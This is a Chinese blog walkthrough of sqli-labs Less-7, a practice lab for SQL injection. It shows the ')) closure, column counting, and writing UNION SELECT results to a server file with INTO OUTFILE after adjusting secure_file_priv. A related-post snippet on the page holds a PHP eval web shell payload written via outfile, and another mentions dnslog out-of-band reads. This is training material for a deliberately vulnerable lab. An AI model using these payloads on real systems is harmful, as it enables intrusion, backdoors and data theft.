sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置

已于 2024-06-09 16:01:27 修改
阅读量351 收藏 2
点赞数 9
分类专栏: 蓝桥网安日志 文章标签: less 前端 css web安全 安全 改行学it 计算机网络
于 2024-06-09 15:52:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Superstacks/article/details/139371145
版权 
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 7

SQLI DUMB SERIES-7

判断注入点

进入页面中,并输入数据查看结果。
判断注入点
发现空数据提示语法问题
发现空数据提示语法问题
输入单引号会提示语法问题。
scroll lock
经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。
sqli dumb series
只有列号为3的时候,才能正常显示,则字段长度为3。

http://sqli-labs.com/Less-7/
?id=1')) order by 3 --+

less-7

注入

SELECT column1 FROM table_name INTO OUTFILE 'file_path'
OUTFILE命令可以将查询结果导出为文本文件,CSV文件等多种格式。
注意:使用这个功能需要提前开启权限。你可以前往MySQL的源文件目录中,
	打开my.ini配置文件,并修改其中的`secure_file_priv='D://'`
	参数设置为你的安全目录。(请设置为C盘以外的磁盘,避免系统权限问题。)
	修改完成并重启后在MySQL命令行中输入`show variables like '%secure%';`查看是否设置成功。

根据页面的提示我们也可以采用outfile的方式进行注入:

http://sqli-labs.com/Less-7/
?id=1')) union select database(),version(),user() from dual into outfile "d:\\project\\sqli-labs-master\\Less-7\\1.txt" --+

into outfile

SELECT * FROM users WHERE id=(('id=1')) union select version(),database(),user() into outfile "D:\\project\\sqli-labs-master\\Less-7\\1.txt";

打开文件看一下效果:
root@localhost
至此,注入成功。

系列文章

超栈
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初sql注入者参考
Sqli-labs靶场第7详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 1638
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
SQLI DUMB SERIES-7
imomoe的博客
09-23 511
由于没有回显且作者希望我们使用outfile所以我们使用mysql中的 select into outfile语句将结果输出到指定的文件中 ?id=1'))--+ 构造闭合 ?id=1')) union all select 1,2,'<?php @eval($_POST["xxx"]);?>' into outfile '/var/www/sql/123.txt' --+ ...
sqli-labs第七
YQavenger的博客
10-08 3160
1、首先判断注入点 正常显示是这样的 不正常显示是这样的 猜到最后,注入点是字符型,单引号加两个小括号,?id=1’)) – - 因为它只有正常显示和不正常显示两种状态,并且也没有MySQL的报错信息。正常来说,这里可以使用盲注,但是它页面上提示的有“Use outfile…”,既然它提示了,那么就说明它开了读写权限。所以这一就用SQL注入读写文件来试一下 2、判断文件路径 可以利用读文件函数load_file(),结合dnslog.cn网站,实现带外攻击,看到MySQL的安装目录在哪。 先说一下M
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 4213
下面选取几个具有代表性的卡,演示几种 SQL 注入漏洞利用方法。
SQL注入sqli-labs靶场(1-37
qq_68163788的博客
02-03 4939
sqli-labs是一个用于习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和习,用户可以更好地了解SQL注入的危害,并会如何防范和阻止SQL注入攻击
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sql注入sqli-labs靶场前几讲解
m0_70483044的博客
01-09 1887
sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中,再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中,被当作是SQL语句的一部分执行,从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端,前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
react+customize-cra使用less+less-loader时,可能遇到的问题及解决办法
mollerlala的博客
06-29 715
链接如下modules: {},},},},})
前端面试题(12)答案版
weixin_49062485的博客
06-30 697
在不同的操作系统上,设置环境变量的方式有所不同,比如在Windows上使用set命令,在Unix/Linux上使用export命令。-2) setImmediate:是Node.js中的特有API,属于微任务,会被添加到微任务队列中,在事件循环的微任务阶段执行。2) 执行完所有宏任务后,检查微任务队列(如Promise.then)是否有待执行的任务,依次执行。- 1)setTimeout:是宏任务,会被添加到宏任务队列中,在事件循环的宏任务阶段执行。在前端面试中,考察这些基本概念是非常常见的。
WHAT - NextJS 的路由系统和 react-router-dom
最新发布
weixin_58540586的博客
07-04 680
不,Next.js 的路由系统并不基于。Next.js 本身内置了自己的路由系统,并且在其生命周期和工作方式上与有所不同。
探索WebKit的插件帝国:深入插件系统的奥秘
2401_85763803的博客
06-30 476
WebKit的插件系统允许第三方开发者扩展浏览器的功能。插件可以拦截网页中的特定资源请求,执行自定义的代码,并以各种形式与用户交互。通过本文的深入探讨,你现在应该对WebKit的插件系统有了全面的理解。从插件的创建到生命周期管理,再到性能优化和安全性考虑,本文提供了一个全面的指南。WebKit插件系统的强大功能,为开发者提供了广阔的创新空间。
JavaScript检查对象是否包含某个属性
徐三岁的博客
06-28 985
当使用 Object.prototype.hasOwnProperty.call 时,实际上是在调用 hasOwnProperty 方法,并明确指定 this 的值,这使得可以检查任何对象是否拥有指定的属性。使用 Object.prototype.hasOwnProperty.call 的好处是,它允许将 hasOwnProperty 方法作为一个函数传递给其他函数,或者在不直接引用对象的情况下使用它。hasOwnProperty 方法会检查对象自身是否具有指定的属性,而不考虑原型链。
怎么再kali Linux配置sqli-labs靶场
05-31
在 Kali Linux 中配置 sqli-labs 靶场,需要进行以下步骤: 1. 安装 LAMP 环境 sqli-labs 是一个基于 PHP 和 MySQLweb 应用程序,因此需要先安装 LAMP 环境。可以使用以下命令安装: ``` sudo apt-get update sudo apt-get install apache2 mysql-server php php-mysql ``` 2. 下载并解压 sqli-labs 可以从 sqli-labs 的官方网站(https://github.com/Audi-1/sqli-labs)下载最新版本的代码,然后解压到 Apache 的 web 根目录中,例如: ``` sudo wget https://github.com/Audi-1/sqli-labs/archive/master.zip sudo unzip master.zip -d /var/www/ ``` 3. 配置 MySQL 数据库 使用以下命令登录 MySQL 数据库: ``` sudo mysql -u root -p ``` 然后创建一个名为 `security` 的数据库: ``` CREATE DATABASE security; ``` 接着创建一个名为 `security_user` 的用户,并授予该用户访问 `security` 数据库的权限: ``` CREATE USER 'security_user'@'localhost' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON security.* TO 'security_user'@'localhost'; FLUSH PRIVILEGES; ``` 4. 导入 sqli-labs 数据库 使用以下命令导入 sqli-labs 的数据库结构和数据: ``` sudo mysql -u security_user -p security < /var/www/sqli-labs-master/sql-connections/db_structure_mysql.sql ``` 5. 启动 Apache 和 MySQL 服务 使用以下命令启动 Apache 和 MySQL 服务: ``` sudo systemctl start apache2 sudo systemctl start mysql ``` 6. 访问 sqli-labs 现在可以在浏览器中访问 sqli-labs 了,例如在地址栏输入 `http://localhost/sqli-labs-master`。如果一切配置正确,应该可以看到 sqli-labs 的主页。 注意:在实际使用 sqli-labs 进行 SQL 注入漏洞测试时,应该始终保持谨慎,避免对其他网站造成不必要的损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值